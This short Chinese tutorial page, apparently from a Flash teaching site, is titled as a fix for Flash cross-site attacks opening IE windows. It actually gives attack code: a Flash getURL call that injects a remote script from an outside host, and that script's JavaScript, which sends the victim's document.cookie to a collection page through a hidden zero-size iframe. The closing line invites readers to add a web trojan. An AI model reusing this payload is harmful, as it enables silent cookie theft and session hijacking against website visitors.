http://www2.flash8.net/teach/5250.htm
防止Flash跨站攻击弹出IE窗口


flash中代码：
getURL("BLOCKED SCRIPTdocument.all.tags('SCRIPT')[0].src='http:\/\/www.godog.y365.com\/wodemuma\/icyfox.js';eval();","_self")

icyfox.js 代码：
cookieurl="http://用于收集Cookie的网页地址?cookie="+escape(document.cookie);
/*这里使用了escape()对cookie编码，用来防止cookie中的一些特殊字符*/
document.body.insertAdjacentHTML('beforeEnd','<iframe WIDTH=0px HEIGHT=0px style="display:none;" src="'+cookieurl+'"><\/iframe>');
/*这里使用了insertAdjacentHTML在body的最后插入了一个不可见的框架*/


这里主要是利用了可以在一个网页中引入不同域中的javascript代码文档，而且所引入的javascript代码文档会和本网页融为一体的特点！至此Flash跨站攻击弹出IE窗口的问题算是解决啦！当然如果你愿意，在icyfox.js中加个网页木马之类的我也无话可说!